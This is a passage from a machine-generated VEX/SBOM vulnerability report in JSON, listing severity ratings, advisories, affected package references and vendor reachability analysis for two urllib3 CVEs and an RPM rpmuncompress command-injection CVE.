        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        200
      ],
      "description": "urllib3 is an HTTP client library for Python. From 1.23 to before 2.7.0, cross-origin redirects followed from the low-level API via ProxyManager.connection_from_url().urlopen(..., assert_same_host=False) still forward these sensitive headers. This vulnerability is fixed in 2.7.0.",
      "recommendation": "Upgrade urllib3 to version 2.7.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44431"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28000"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28158"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44431"
        },
        {
          "url": "https://bugzilla.redhat.com/2477154"
        },
        {
          "url": "https://bugzilla.redhat.com/2477167"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477154"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477167"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44431"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44432"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-28000.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28158"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-44431.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-49927.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2026/06/msg00040.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8379-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44431"
        }
      ],
      "published": "2026-05-13T16:16:57+00:00",
      "updated": "2026-06-26T12:16:32+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/urllib3@2.6.3",
          "versions": [
            {
              "version": "2.6.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:pypi/urllib3@2.6.3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44432",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        409
      ],
      "description": "urllib3 is an HTTP client library for Python. From 2.6.0 to before 2.7.0, urllib3 could decompress the whole response instead of the requested portion (1) during the second HTTPResponse.read(amt=N) call when the response was decompressed using the official Brotli library or (2) when HTTPResponse.drain_conn() was called after the response had been read and decompressed partially (compression algorithm did not matter here). These issues could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This could result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data) on the client side. This vulnerability is fixed in 2.7.0.",
      "recommendation": "Upgrade urllib3 to version 2.7.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44432"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:15862"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20338"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:22934"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24000"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24009"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24014"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24069"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24476"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24483"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24540"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24541"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24542"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24544"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25039"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25143"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25928"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26212"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26304"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:27929"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28000"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28157"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28158"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28159"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28571"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30076"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30087"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30088"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30089"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:32992"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33313"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33683"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34526"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34531"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34533"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34607"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36350"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37275"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41066"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42079"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42132"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42144"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42796"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43038"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44481"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51206"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56347"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7625"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7634"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44432"
        },
        {
          "url": "https://bugzilla.redhat.com/2477154"
        },
        {
          "url": "https://bugzilla.redhat.com/2477167"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477154"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477167"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44431"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44432"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-28000.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28158"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2026-142.yaml"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-44432.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-32992.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-44432.json"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8379-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44432"
        }
      ],
      "published": "2026-05-13T16:16:57+00:00",
      "updated": "2026-08-19T12:18:19+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/urllib3@2.6.3",
          "versions": [
            {
              "version": "2.6.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:pypi/urllib3@2.6.3"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:pypi/urllib3@2.6.3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44604",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "cwes": [
        78
      ],
      "description": "A command injection vulnerability was discovered in the `rpmuncompress` utility of RPM. When extracting certain archive formats (ZIP, 7z, GEM) to a specified destination directory, the tool inserts the archive's top-level folder name into a shell command without properly sanitizing it. A specially crafted archive containing shell metacharacters in its folder name can execute arbitrary commands as the user running the extraction.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44604"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28491"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44604"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460967"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44604"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44604"
        }
      ],
      "published": "2026-05-28T08:16:35+00:00",
      "updated": "2026-06-23T20:16:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
